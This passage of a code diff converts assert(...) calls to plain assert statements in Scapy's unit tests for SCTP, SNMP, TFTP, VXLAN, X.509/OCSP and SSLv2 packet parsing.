sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x04" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkShutdownAck)) -assert(p.flags == 0) -assert(p.len == 4) +assert isinstance(p, SCTPChunkShutdownAck) +assert p.flags == 0 +assert p.len == 4 = basic SCTPChunkError - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x04" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkError)) -assert(p.flags == 0) -assert(p.len == 4) -assert(p.error_causes == b"") +assert isinstance(p, SCTPChunkError) +assert p.flags == 0 +assert p.len == 4 +assert p.error_causes == b"" = basic SCTPChunkCookieEcho - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0A\x00\x00\x04" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkCookieEcho)) -assert(p.flags == 0) -assert(p.len == 4) -assert(p.cookie == b"") +assert isinstance(p, SCTPChunkCookieEcho) +assert p.flags == 0 +assert p.len == 4 +assert p.cookie == b"" = basic SCTPChunkCookieAck - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x04" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkCookieAck)) -assert(p.flags == 0) -assert(p.len == 4) +assert isinstance(p, SCTPChunkCookieAck) +assert p.flags == 0 +assert p.len == 4 = basic SCTPChunkShutdownComplete - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0E\x00\x00\x04" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkShutdownComplete)) -assert(p.reserved == 0) -assert(p.TCB == 0) -assert(p.len == 4) +assert isinstance(p, SCTPChunkShutdownComplete) +assert p.reserved == 0 +assert p.TCB == 0 +assert p.len == 4 = basic SCTPChunkAuthentication - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x08\x00\x00\x00\x00" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkAuthentication)) -assert(p.flags == 0) -assert(p.len == 8) -assert(p.shared_key_id == 0) -assert(p.HMAC_function == 0) +assert isinstance(p, SCTPChunkAuthentication) +assert p.flags == 0 +assert p.len == 8 +assert p.shared_key_id == 0 +assert p.HMAC_function == 0 = basic SCTPChunkAddressConf - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc1\x00\x00\x08\x00\x00\x00\x00" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkAddressConf)) -assert(p.flags == 0) -assert(p.len == 8) -assert(p.seq == 0) -assert(p.params == []) +assert isinstance(p, SCTPChunkAddressConf) +assert p.flags == 0 +assert p.len == 8 +assert p.seq == 0 +assert p.params == [] = basic SCTPChunkAddressConfAck - Dissection ~ sctp blob = b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x08\x00\x00\x00\x00" p = SCTP(blob).lastlayer() -assert(isinstance(p, SCTPChunkAddressConfAck)) -assert(p.flags == 0) -assert(p.len == 8) -assert(p.seq == 0) -assert(p.params == []) +assert isinstance(p, SCTPChunkAddressConfAck) +assert p.flags == 0 +assert p.len == 8 +assert p.seq == 0 +assert p.params == [] = SCTPChunkParamRandom - Consecutive calls ~ sctp param1, param2 = SCTPChunkParamRandom(), SCTPChunkParamRandom() -assert(param1.random != param2.random) +assert param1.random != param2.random = SCTP in ICMP ~ sctp icmp p1 = IP(raw(IP(src=RandIP(), dst=RandIP()) / SCTP(sport=RandShort(), dport=RandShort()))) p2 = IP(raw(IP(src=RandIP(), dst=p1[IP].src) / ICMP(type=3, code=1) / p1)) -assert(p2.answers(p1)) +assert p2.answers(p1) diff --git a/test/scapy/layers/snmp.uts b/test/scapy/layers/snmp.uts index 31afbb4f416..987dcecd1d3 100644 --- a/test/scapy/layers/snmp.uts +++ b/test/scapy/layers/snmp.uts @@ -11,23 +11,23 @@ ~ SNMP ASN1 r = raw(SNMP()) r -assert(r == b'0\x18\x02\x01\x01\x04\x06public\xa0\x0b\x02\x01\x00\x02\x01\x00\x02\x01\x000\x00') +assert r == b'0\x18\x02\x01\x01\x04\x06public\xa0\x0b\x02\x01\x00\x02\x01\x00\x02\x01\x000\x00' p = SNMP(version="v2c", community="ABC", PDU=SNMPbulk(id=4,varbindlist=[SNMPvarbind(oid="1.2.3.4",value=ASN1_INTEGER(7)),SNMPvarbind(oid="4.3.2.1.2.3",value=ASN1_IA5_STRING("testing123"))])) p r = raw(p) r -assert(r == b'05\x02\x01\x01\x04\x03ABC\xa5+\x02\x01\x04\x02\x01\x00\x02\x01\x000 0\x08\x06\x03*\x03\x04\x02\x01\x070\x14\x06\x06\x81#\x02\x01\x02\x03\x16\ntesting123') +assert r == b'05\x02\x01\x01\x04\x03ABC\xa5+\x02\x01\x04\x02\x01\x00\x02\x01\x000 0\x08\x06\x03*\x03\x04\x02\x01\x070\x14\x06\x06\x81#\x02\x01\x02\x03\x16\ntesting123' = SNMP disassembling ~ SNMP ASN1 x=SNMP(b'0y\x02\x01\x00\x04\x06public\xa2l\x02\x01)\x02\x01\x00\x02\x01\x000a0!\x06\x12+\x06\x01\x04\x01\x81}\x08@\x04\x02\x01\x07\n\x86\xde\xb78\x04\x0b172.31.19.20#\x06\x12+\x06\x01\x04\x01\x81}\x08@\x04\x02\x01\x07\n\x86\xde\xb76\x04\r255.255.255.00\x17\x06\x12+\x06\x01\x04\x01\x81}\x08@\x04\x02\x01\x05\n\x86\xde\xb9`\x02\x01\x01') x.show() -assert(x.community==b"public" and x.version == 0) -assert(x.PDU.id == 41 and len(x.PDU.varbindlist) == 3) -assert(x.PDU.varbindlist[0].oid == "1.3.6.1.4.1.253.8.64.4.2.1.7.10.14130104") -assert(x.PDU.varbindlist[0].value == b"172.31.19.2") -assert(x.PDU.varbindlist[2].oid == "1.3.6.1.4.1.253.8.64.4.2.1.5.10.14130400") -assert(x.PDU.varbindlist[2].value == 1) +assert x.community==b"public" and x.version == 0 +assert x.PDU.id == 41 and len(x.PDU.varbindlist) == 3 +assert x.PDU.varbindlist[0].oid == "1.3.6.1.4.1.253.8.64.4.2.1.7.10.14130104" +assert x.PDU.varbindlist[0].value == b"172.31.19.2" +assert x.PDU.varbindlist[2].oid == "1.3.6.1.4.1.253.8.64.4.2.1.5.10.14130400" +assert x.PDU.varbindlist[2].value == 1 = Basic UDP/SNMP bindings ~ SNMP ASN1 @@ -60,7 +60,7 @@ except BER_Decoding_Error: # snmpwalk(dst=dst) # output = cmco.get_output() # expected = "No answers\n" -# assert(output == expected) +# assert output == expected # #test_snmpwalk("secdev.org") diff --git a/test/scapy/layers/tftp.uts b/test/scapy/layers/tftp.uts index d9119ae9d9e..f4ec15b8169 100644 --- a/test/scapy/layers/tftp.uts +++ b/test/scapy/layers/tftp.uts @@ -9,8 +9,8 @@ = TFTP Options x=IP()/UDP(sport=12345)/TFTP()/TFTP_RRQ(filename="fname")/TFTP_Options(options=[TFTP_Option(oname="blksize", value="8192"),TFTP_Option(oname="other", value="othervalue")]) -assert( raw(x) == b'E\x00\x00H\x00\x01\x00\x00@\x11|\xa2\x7f\x00\x00\x01\x7f\x00\x00\x0109\x00E\x004B6\x00\x01fname\x00octet\x00blksize\x008192\x00other\x00othervalue\x00' ) +assert raw(x) == b'E\x00\x00H\x00\x01\x00\x00@\x11|\xa2\x7f\x00\x00\x01\x7f\x00\x00\x0109\x00E\x004B6\x00\x01fname\x00octet\x00blksize\x008192\x00other\x00othervalue\x00' y=IP(raw(x)) y[TFTP_Option].oname y[TFTP_Option:2].oname -assert(len(y[TFTP_Options].options) == 2 and y[TFTP_Option].oname == b"blksize") +assert len(y[TFTP_Options].options) == 2 and y[TFTP_Option].oname == b"blksize" diff --git a/test/scapy/layers/vxlan.uts b/test/scapy/layers/vxlan.uts index a697e4b62d6..092267778d7 100644 --- a/test/scapy/layers/vxlan.uts +++ b/test/scapy/layers/vxlan.uts @@ -19,36 +19,36 @@ p = Ether(dst="11:11:11:11:11:11", src="22:22:22:22:22:22") p /= IP(src="1.1.1.1", dst="2.2.2.2") / UDP(sport=1111) p /= VXLAN(flags=0xC, vni=42, NextProtocol=0) / Ether() / IP() p = Ether(raw(p)) -assert(p[UDP].dport == 4789) -assert(p[Ether:2].type == 0x800) +assert p[UDP].dport == 4789 +assert p[Ether:2].type == 0x800 = Build a VXLAN packet with next protocol field p = Ether(dst="11:11:11:11:11:11", src="22:22:22:22:22:22") p /= IP(src="1.1.1.1", dst="2.2.2.2") / UDP(sport=1111) p /= VXLAN(flags=0xC, vni=42, NextProtocol=3) / Ether() / IP() p = Ether(raw(p)) -assert(p[UDP].dport == 4789) -assert(p[VXLAN].reserved0 == 0x0) -assert(p[VXLAN].NextProtocol == 3) -assert(p[Ether:2].type == 0x800) +assert p[UDP].dport == 4789 +assert p[VXLAN].reserved0 == 0x0 +assert p[VXLAN].NextProtocol == 3 +assert p[Ether:2].type == 0x800 = Build a VXLAN packet with no group policy ID p = Ether(dst="11:11:11:11:11:11", src="22:22:22:22:22:22") p /= IP(src="1.1.1.1", dst="2.2.2.2") / UDP(sport=1111) p /= VXLAN(flags=0xC, vni=42) / Ether() / IP() p = Ether(raw(p)) -assert(p[VXLAN].reserved2 == 0x0) -assert(p[VXLAN].gpid is None) -assert(p[Ether:2].type == 0x800) +assert p[VXLAN].reserved2 == 0x0 +assert p[VXLAN].gpid is None +assert p[Ether:2].type == 0x800 = Build a VXLAN packet with group policy ID = 42 p = Ether(dst="11:11:11:11:11:11", src="22:22:22:22:22:22") p /= IP(src="1.1.1.1", dst="2.2.2.2") / UDP(sport=1111) p /= VXLAN(flags=0x8C, gpid=42, vni=42) / Ether() / IP() p = Ether(raw(p)) -assert(p[VXLAN].gpid == 42) -assert(p[VXLAN].reserved1 is None) -assert(p[Ether:2].type == 0x800) +assert p[VXLAN].gpid == 42 +assert p[VXLAN].reserved1 is None +assert p[Ether:2].type == 0x800 = Build a VXLAN packet followed by and IP or IPv6 layer etherproto = 0x0 @@ -59,27 +59,27 @@ ipv6test = "659f:2c23:565:3fab:32d5:bb95:a0ed:2e3b" expkt = UDP() / VXLAN() / IP(dst=iptest) / "testing" expkt = UDP(bytes(expkt)) -assert(expkt[VXLAN].NextProtocol == ipproto) -assert(IP in expkt) -assert(expkt[IP].dst == iptest) +assert expkt[VXLAN].NextProtocol == ipproto +assert IP in expkt +assert expkt[IP].dst == iptest expkt = UDP() / VXLAN() / IPv6(dst=ipv6test) / "testing" expkt = UDP(bytes(expkt)) -assert(expkt[VXLAN].NextProtocol == ipv6proto) -assert(IPv6 in expkt) -assert(expkt[IPv6].dst == ipv6test) +assert expkt[VXLAN].NextProtocol == ipv6proto +assert IPv6 in expkt +assert expkt[IPv6].dst == ipv6test expkt = UDP() / VXLAN(flags=0x4, NextProtocol=ipproto) / "0xfffffffffffffffffffffffffffffffffffffffffffff" expkt = UDP(bytes(expkt)) -assert(IP in expkt) +assert IP in expkt expkt = UDP() / VXLAN(flags=0x4, NextProtocol=ipv6proto) / "0xfffffffffffffffffffffffffffffffffffffffffffff" expkt = UDP(bytes(expkt)) -assert(IPv6 in expkt) +assert IPv6 in expkt expkt = UDP() / VXLAN(flags=0x4, NextProtocol=etherproto) / "0xfffffffffffffffffffffffffffffffffffffffffffff" expkt = UDP(bytes(expkt)) -assert(Ether in expkt) +assert Ether in expkt = Dissect VXLAN with no NextProtocol pkt = VXLAN(b'\x08\x00\x00\x00\x00"H\x00\xcaF\xae\x10\xed\x0f\x0c\x00\x00\x00\x00\x00\x08\x06\x00\x01\x08\x00\x06\x04\x00\x02\x0c\x00\x00\x00\x00\x00\x7f\xff\xff\xfe\x11"3DUf\x7f\x00\x00\x02') diff --git a/test/scapy/layers/x509.uts b/test/scapy/layers/x509.uts index 4b2f846c8ea..fce5496c94e 100644 --- a/test/scapy/layers/x509.uts +++ b/test/scapy/layers/x509.uts @@ -68,17 +68,17 @@ tbs.serialNumber == ASN1_INTEGER(0xb45e7043e7090b71) = Cert class : Signature algorithm (as advertised by TBSCertificate) from scapy.layers.x509 import X509_AlgorithmIdentifier -assert(type(tbs.signature) is X509_AlgorithmIdentifier) +assert type(tbs.signature) is X509_AlgorithmIdentifier tbs.signature.algorithm == ASN1_OID("sha1-with-rsa-signature") = Cert class : Issuer structure from scapy.layers.x509 import X509_AttributeTypeAndValue from scapy.layers.x509 import X509_RDN -assert(type(tbs.issuer) is list) -assert(len(tbs.issuer) == 7) -assert(type(tbs.issuer[0]) is X509_RDN) -assert(type(tbs.issuer[0].rdn) is list) -assert(type(tbs.issuer[0].rdn[0]) is X509_AttributeTypeAndValue) +assert type(tbs.issuer) is list +assert len(tbs.issuer) == 7 +assert type(tbs.issuer[0]) is X509_RDN +assert type(tbs.issuer[0].rdn) is list +assert type(tbs.issuer[0].rdn[0]) is X509_AttributeTypeAndValue = Cert class : Issuer first attribute tbs.issuer[0].rdn[0].type == ASN1_OID("countryName") and tbs.issuer[0].rdn[0].value == ASN1_PRINTABLE_STRING(b"FR") @@ -88,15 +88,15 @@ tbs.get_issuer_str() == '/C=FR/ST=Paris/L=Paris/O=Mushroom Corp./OU=Mushroom VPN = Cert class : Validity from scapy.layers.x509 import X509_Validity -assert(type(tbs.validity) is X509_Validity) +assert type(tbs.validity) is X509_Validity tbs.validity.not_before == ASN1_UTC_TIME("060713073859Z") and tbs.validity.not_after == ASN1_UTC_TIME("260330073859Z") = Cert class : Subject structure -assert(type(tbs.subject) is list) -assert(len(tbs.subject) == 7) -assert(type(tbs.subject[0]) is X509_RDN) -assert(type(tbs.subject[0].rdn) is list) -assert(type(tbs.subject[0].rdn[0]) is X509_AttributeTypeAndValue) +assert type(tbs.subject) is list +assert len(tbs.subject) == 7 +assert type(tbs.subject[0]) is X509_RDN +assert type(tbs.subject[0].rdn) is list +assert type(tbs.subject[0].rdn[0]) is X509_AttributeTypeAndValue = Cert class : Subject last attribute tbs.issuer[6].rdn[0].type == ASN1_OID("emailAddress") and tbs.issuer[6].rdn[0].value == ASN1_IA5_STRING(b"ikev2-test@mushroom.corp") @@ -106,33 +106,33 @@ tbs.get_subject_str() == '/C=FR/ST=Paris/L=Paris/O=Mushroom Corp./OU=Mushroom VP = Cert class : SubjectPublicKey algorithm from scapy.layers.x509 import X509_SubjectPublicKeyInfo -assert(type(tbs.subjectPublicKeyInfo) is X509_SubjectPublicKeyInfo) +assert type(tbs.subjectPublicKeyInfo) is X509_SubjectPublicKeyInfo spki = tbs.subjectPublicKeyInfo spki.signatureAlgorithm.algorithm == ASN1_OID("rsaEncryption") = Cert class : SubjectPublicKey value from scapy.layers.x509 import RSAPublicKey -assert(type(spki.subjectPublicKey) is RSAPublicKey) +assert type(spki.subjectPublicKey) is RSAPublicKey spki.subjectPublicKey.modulus == ASN1_INTEGER(19231328316532061413420367242571475005688288081144416166988378525696075445024135424022026378563116068168327239354659928492979285632474448448624869172454076124150405352043642781483254546569202103296262513098482624188672299255268092629150366527784294463900039290024710152521604731213565912934889752122898104556895316819303096201441834849255370122572613047779766933573375974464479123135292080801384304131606933504677232323037116557327478512106367095125103346134248056463878553619525193565824925835325216545121044922690971718737998420984924512388011040969150550056783451476150234324593710633552558175109683813482739004163) and spki.subjectPublicKey.publicExponent == ASN1_INTEGER(65537) = Cert class : Extensions structure ext = tbs.extensions -assert(type(ext) is list) -assert(len(ext) == 3) +assert type(ext) is list +assert len(ext) == 3 = Cert class : Subject key identifier extension info from scapy.layers.x509 import X509_Extension -assert(type(ext[0]) is X509_Extension) +assert type(ext[0]) is X509_Extension ext[0].extnID == ASN1_OID("subjectKeyIdentifier") and ext[0].critical == None = Cert class : Subject key identifier extension value from scapy.layers.x509 import X509_ExtSubjectKeyIdentifier -assert(type(ext[0].extnValue) is X509_ExtSubjectKeyIdentifier) +assert type(ext[0].extnValue) is X509_ExtSubjectKeyIdentifier ext[0].extnValue.keyIdentifier == ASN1_STRING(b'\xf3\xd8N\xde\x90\xf7\xe6]\xd2\xce3\xcd\\V\x8co\x97\x141K') = Cert class : Signature algorithm from scapy.layers.x509 import X509_AlgorithmIdentifier -assert(type(x.signatureAlgorithm) is X509_AlgorithmIdentifier) +assert type(x.signatureAlgorithm) is X509_AlgorithmIdentifier x.signatureAlgorithm.algorithm == ASN1_OID("sha1-with-rsa-signature") = Cert class : Signature value @@ -166,15 +166,15 @@ tbs = x.tbsCertList tbs.version == None = CRL class : Signature algorithm (as advertised by TBSCertList) -assert(type(tbs.signature) is X509_AlgorithmIdentifier) +assert type(tbs.signature) is X509_AlgorithmIdentifier tbs.signature.algorithm == ASN1_OID("sha1-with-rsa-signature") = CRL class : Issuer structure -assert(type(tbs.issuer) is list) -assert(len(tbs.issuer) == 3) -assert(type(tbs.issuer[0]) is X509_RDN) -assert(type(tbs.issuer[0].rdn) is list) -assert(type(tbs.issuer[0].rdn[0]) is X509_AttributeTypeAndValue) +assert type(tbs.issuer) is list +assert len(tbs.issuer) == 3 +assert type(tbs.issuer[0]) is X509_RDN +assert type(tbs.issuer[0].rdn) is list +assert type(tbs.issuer[0].rdn[0]) is X509_AttributeTypeAndValue = CRL class : Issuer first attribute tbs.issuer[0].rdn[0].type == ASN1_OID("countryName") and tbs.issuer[0].rdn[0].value == ASN1_PRINTABLE_STRING(b"US") @@ -190,9 +190,9 @@ tbs.next_update == ASN1_UTC_TIME("070217235959Z") = CRL class : Optional revoked_certificates structure from scapy.layers.x509 import X509_RevokedCertificate -assert(type(tbs.revokedCertificates) is list) -assert(len(tbs.revokedCertificates) == 7) -assert(type(tbs.revokedCertificates[0]) is X509_RevokedCertificate) +assert type(tbs.revokedCertificates) is list +assert len(tbs.revokedCertificates) == 7 +assert type(tbs.revokedCertificates[0]) is X509_RevokedCertificate = CRL class : Revoked_certificates first attribute tbs.revokedCertificates[0].serialNumber == ASN1_INTEGER(59577943160751197113872490992424857032) and tbs.revokedCertificates[0].revocationDate == ASN1_UTC_TIME("040401175615Z") @@ -201,7 +201,7 @@ tbs.revokedCertificates[0].serialNumber == ASN1_INTEGER(595779431607511971138724 tbs.crlExtensions == None = CRL class : Signature algorithm -assert(type(x.signatureAlgorithm) is X509_AlgorithmIdentifier) +assert type(x.signatureAlgorithm) is X509_AlgorithmIdentifier x.signatureAlgorithm.algorithm == ASN1_OID("sha1-with-rsa-signature") = CRL class : Signature value @@ -218,13 +218,13 @@ raw(X509_CRL(s)) == s from scapy.layers.x509 import ASN1P_INTEGER, X509_OtherName random.seed(42) r = ASN1F_SEQUENCE_OF("test", [], ASN1P_INTEGER).randval().number -assert(isinstance(r, RandNum)) +assert isinstance(r, RandNum) int(r) == -16393048219351680611 = Randval tests : ASN1F_PACKET random.seed(0xcafecafe) r = ASN1F_PACKET("otherName", None, X509_OtherName).randval() -assert(isinstance(r, X509_OtherName)) +assert isinstance(r, X509_OtherName) str(r.type_id) == '171.184.10.271' @@ -237,37 +237,37 @@ response = OCSP_Response(s) = OCSP class : OCSP Response global checks from scapy.layers.x509 import OCSP_ResponseBytes -assert(response.responseStatus.val == 0) -assert(isinstance(response.responseBytes, OCSP_ResponseBytes)) +assert response.responseStatus.val == 0 +assert isinstance(response.responseBytes, OCSP_ResponseBytes) responseBytes = response.responseBytes -assert(responseBytes.responseType == ASN1_OID("basic-response")) -assert(responseBytes.signatureAlgorithm.algorithm == ASN1_OID("sha256WithRSAEncryption")) -assert(responseBytes.signatureAlgorithm.parameters == ASN1_NULL(0)) -assert(responseBytes.signature.val_readable[:3] == b"\x90\xef\xf9" and responseBytes.signature.val_readable[-3:] == b"\x8bb\xfc") +assert responseBytes.responseType == ASN1_OID("basic-response") +assert responseBytes.signatureAlgorithm.algorithm == ASN1_OID("sha256WithRSAEncryption") +assert responseBytes.signatureAlgorithm.parameters == ASN1_NULL(0) +assert responseBytes.signature.val_readable[:3] == b"\x90\xef\xf9" and responseBytes.signature.val_readable[-3:] == b"\x8bb\xfc" responseBytes.certs is None = OCSP class : OCSP ResponseData checks from scapy.layers.x509 import OCSP_ByKey responseData = responseBytes.tbsResponseData -assert(responseData.version is None) +assert responseData.version is None rID = responseData.responderID.responderID -assert(isinstance(rID, OCSP_ByKey)) -assert(rID.byKey.val[:3] == b"Qh\xff" and rID.byKey.val[-3:] == b"Yr;") -assert(responseData.producedAt == ASN1_GENERALIZED_TIME("20160914121000Z")) -assert(len(responseData.responses) == 1) +assert isinstance(rID, OCSP_ByKey) +assert rID.byKey.val[:3] == b"Qh\xff" and rID.byKey.val[-3:] == b"Yr;" +assert responseData.producedAt == ASN1_GENERALIZED_TIME("20160914121000Z") +assert len(responseData.responses) == 1 responseData.responseExtensions is None = OCSP class : OCSP SingleResponse checks from scapy.layers.x509 import OCSP_GoodInfo singleResponse = responseData.responses[0] -assert(singleResponse.certID.hashAlgorithm.algorithm == ASN1_OID("sha1")) -assert(singleResponse.certID.hashAlgorithm.parameters == ASN1_NULL(0)) -assert(singleResponse.certID.issuerNameHash.val[:3] == b"\xcf&\xf5" and singleResponse.certID.issuerNameHash.val[-3:] == b"\x8e_\n") -assert(singleResponse.certID.issuerKeyHash.val[:3] == b"Qh\xff" and singleResponse.certID.issuerKeyHash.val[-3:] == b"Yr;") -assert(singleResponse.certID.serialNumber.val == 0x77a5dc3362301f989fe54f7f86f3e64) -assert(isinstance(singleResponse.certStatus.certStatus, OCSP_GoodInfo)) -assert(singleResponse.thisUpdate == ASN1_GENERALIZED_TIME("20160914121000Z")) -assert(singleResponse.nextUpdate == ASN1_GENERALIZED_TIME("20160921112500Z")) +assert singleResponse.certID.hashAlgorithm.algorithm == ASN1_OID("sha1") +assert singleResponse.certID.hashAlgorithm.parameters == ASN1_NULL(0) +assert singleResponse.certID.issuerNameHash.val[:3] == b"\xcf&\xf5" and singleResponse.certID.issuerNameHash.val[-3:] == b"\x8e_\n" +assert singleResponse.certID.issuerKeyHash.val[:3] == b"Qh\xff" and singleResponse.certID.issuerKeyHash.val[-3:] == b"Yr;" +assert singleResponse.certID.serialNumber.val == 0x77a5dc3362301f989fe54f7f86f3e64 +assert isinstance(singleResponse.certStatus.certStatus, OCSP_GoodInfo) +assert singleResponse.thisUpdate == ASN1_GENERALIZED_TIME("20160914121000Z") +assert singleResponse.nextUpdate == ASN1_GENERALIZED_TIME("20160921112500Z") singleResponse.singleExtensions is None = OCSP class : OCSP Response reconstruction diff --git a/test/sslv2.uts b/test/sslv2.uts index 0959a9cbe23..bde0a9e0d96 100644 --- a/test/sslv2.uts +++ b/test/sslv2.uts @@ -35,10 +35,10 @@ import binascii t = SSLv2(ch) = Reading SSLv2 session - Record with cleartext -assert(t.len == 46) -assert(not t.padlen) -assert(not t.mac) -assert(not t.pad) +assert t.len == 46 +assert not t.padlen +assert not t.mac +assert not t.pad len(t.msg) == 1 = Reading SSLv2 session - Record __getitem__ @@ -46,41 +46,41 @@ SSLv2ClientHello in t = Reading SSLv2 session - ClientHello ch = t.msg[0] -assert(isinstance(ch, SSLv2ClientHello)) -assert(ch.msgtype == 1) -assert(ch.version == 0x0002) -assert(ch.cipherslen == 21) -assert(not ch.sid) -assert(ch.challengelen == 16) -assert(ch.ciphers == [0x0700c0, 0x050080, 0x030080, 0x010080, 0x060040, 0x040080, 0x020080]) +assert isinstance(ch, SSLv2ClientHello) +assert ch.msgtype == 1 +assert ch.version == 0x0002 +assert ch.cipherslen == 21 +assert not ch.sid +assert ch.challengelen == 16 +assert ch.ciphers == [0x0700c0, 0x050080, 0x030080, 0x010080, 0x060040, 0x040080, 0x020080] ch.challenge == binascii.unhexlify('1afb2f9ca3d1293454a3152821ffd10c') = Reading SSLv2 session - ServerHello t = SSLv2(sh, tls_session=t.tls_session.mirror()) sh = t.msg[0] -assert(isinstance(sh, SSLv2ServerHello)) -assert(sh.msgtype == 4) -assert(sh.sid_hit == 0) -assert(sh.certtype == 1) -assert(sh.version == 0x0002) -assert(sh.certlen == 930) -assert(sh.cipherslen == 3) -assert(sh.connection_idlen == 16) -assert(isinstance(sh.cert, Cert)) -assert(len(sh.cert.der) == 930) -assert(sh.cert.subject_str == '/C=MN/L=Ulaanbaatar/OU=Scapy Test PKI/CN=Scapy Test Server') -assert(sh.ciphers == [0x020080]) +assert isinstance(sh, SSLv2ServerHello) +assert sh.msgtype == 4 +assert sh.sid_hit == 0 +assert sh.certtype == 1 +assert sh.version == 0x0002 +assert sh.certlen == 930 +assert sh.cipherslen == 3 +assert sh.connection_idlen == 16 +assert isinstance(sh.cert, Cert) +assert len(sh.cert.der) == 930 +assert sh.cert.subject_str == '/C=MN/L=Ulaanbaatar/OU=Scapy Test PKI/CN=Scapy Test Server' +assert sh.ciphers == [0x020080] sh.connection_id == binascii.unhexlify('391952a4ab299394cd8a2c5e03b9f180') = Reading SSLv2 session - ClientMasterKey with unknown server key t_enc = SSLv2(mk) mk_enc = t_enc.msg[0] -assert(mk_enc.clearkeylen == 11) -assert(mk_enc.encryptedkeylen == 256) -assert(mk_enc.clearkey == binascii.unhexlify('7ec2f99e946902feedc4dc')) -assert(mk_enc.encryptedkey[:3] == b"\x9b\xe0\xe7" and mk_enc.encryptedkey[-3:] == b"\xea\x57\x2e") -assert(t_enc.tls_session.pwcs.tls_version == 0x0002) -assert(t_enc.tls_session.prcs.tls_version == 0x0002) +assert mk_enc.clearkeylen == 11 +assert mk_enc.encryptedkeylen == 256 +assert mk_enc.clearkey == binascii.unhexlify('7ec2f99e946902feedc4dc') +assert mk_enc.encryptedkey[:3] == b"\x9b\xe0\xe7" and mk_enc.encryptedkey[-3:] == b"\xea\x57\x2e" +assert t_enc.tls_session.pwcs.tls_version == 0x0002 +assert t_enc.tls_session.prcs.tls_version == 0x0002 mk_enc.decryptedkey is None = Reading SSLv2 session - Importing server compromised key @@ -91,85 +91,85 @@ t.tls_session.server_rsa_key = rsa_key = Reading SSLv2 session - ClientMasterKey with compromised server key t = SSLv2(mk, tls_session=t.tls_session.mirror()) -assert(t.len == 277 and not t.padlen and not t.mac and not t.pad) +assert t.len == 277 and not t.padlen and not t.mac and not t.pad mk = t.msg[0] -assert(isinstance(mk, SSLv2ClientMasterKey)) -assert(mk.msgtype == 2) -assert(mk.cipher == 0x020080) -assert(mk.clearkeylen == 11) -assert(mk.encryptedkeylen == 256) -assert(mk.keyarglen == 0) -assert(mk.clearkey == binascii.unhexlify('7ec2f99e946902feedc4dc')) -assert(mk.decryptedkey == binascii.unhexlify('e2d430fc04')) +assert isinstance(mk, SSLv2ClientMasterKey) +assert mk.msgtype == 2 +assert mk.cipher == 0x020080 +assert mk.clearkeylen == 11 +assert mk.encryptedkeylen == 256 +assert mk.keyarglen == 0 +assert mk.clearkey == binascii.unhexlify('7ec2f99e946902feedc4dc') +assert mk.decryptedkey == binascii.unhexlify('e2d430fc04') not mk.keyarg = Reading SSLv2 session - Checking session secrets s = t.tls_session -assert(s.sslv2_common_cs == [0x020080]) -assert(s.sslv2_challenge == ch.challenge) -assert(not s.pre_master_secret) -assert(s.master_secret == b'~\xc2\xf9\x9e\x94i\x02\xfe\xed\xc4\xdc\xe2\xd40\xfc\x04') -assert(s.sslv2_key_material == b'\xf4\xae\x00\x03kB>\x06\xba[\xd7\xea,\x08\xc2\xae\xba\xf3\x10\xbf\xea\x08\x8flV\x11D\xc5L\xad3\xf9') -assert(s.rcs.cipher.key == b'\xba\xf3\x10\xbf\xea\x08\x8flV\x11D\xc5L\xad3\xf9') +assert s.sslv2_common_cs == [0x020080] +assert s.sslv2_challenge == ch.challenge +assert not s.pre_master_secret +assert s.master_secret == b'~\xc2\xf9\x9e\x94i\x02\xfe\xed\xc4\xdc\xe2\xd40\xfc\x04' +assert s.sslv2_key_material == b'\xf4\xae\x00\x03kB>\x06\xba[\xd7\xea,\x08\xc2\xae\xba\xf3\x10\xbf\xea\x08\x8flV\x11D\xc5L\xad3\xf9' +assert s.rcs.cipher.key == b'\xba\xf3\x10\xbf\xea\x08\x8flV\x11D\xc5L\xad3\xf9' s.wcs.cipher.key == b'\xf4\xae\x00\x03kB>\x06\xba[\xd7\xea,\x08\xc2\xae' = Reading SSLv2 session - Record with ciphertext t = SSLv2(sv, tls_session=t.tls_session.mirror()) -assert(t.len == 33) -assert(not t.padlen) -assert(t.mac == b'?:\xf3vE\xf3\xe83\x1a\xd0\xab\xba\xb6\x86\xe6\x89') +assert t.len == 33 +assert not t.padlen +assert t.mac == b'?:\xf3vE\xf3\xe83\x1a\xd0\xab\xba\xb6\x86\xe6\x89' not t.pad = Reading SSLv2 session - ServerVerify sv = t.msg[0] -assert(isinstance(sv, SSLv2ServerVerify)) -assert(sv.msgtype == 5) +assert isinstance(sv, SSLv2ServerVerify) +assert sv.msgtype == 5 sv.challenge == ch.challenge = Reading SSLv2 session - ClientFinished t = SSLv2(cf, tls_session=t.tls_session.mirror()) cf = t.msg[0] -assert(isinstance(cf, SSLv2ClientFinished)) -assert(cf.msgtype == 3) +assert isinstance(cf, SSLv2ClientFinished) +assert cf.msgtype == 3 cf.connection_id == sh.connection_id = Reading SSLv2 session - RequestCertificate t = SSLv2(rc, tls_session=t.tls_session.mirror()) rc = t.msg[0] -assert(isinstance(rc, SSLv2RequestCertificate)) -assert(rc.msgtype == 7) -assert(rc.authtype == 1) +assert isinstance(rc, SSLv2RequestCertificate) +assert rc.msgtype == 7 +assert rc.authtype == 1 rc.challenge == binascii.unhexlify('19619ddf7384d68e7a614ae1989ab41e') = Reading SSLv2 session - ClientCertificate t = SSLv2(cc, tls_session=t.tls_session.mirror()) cc = 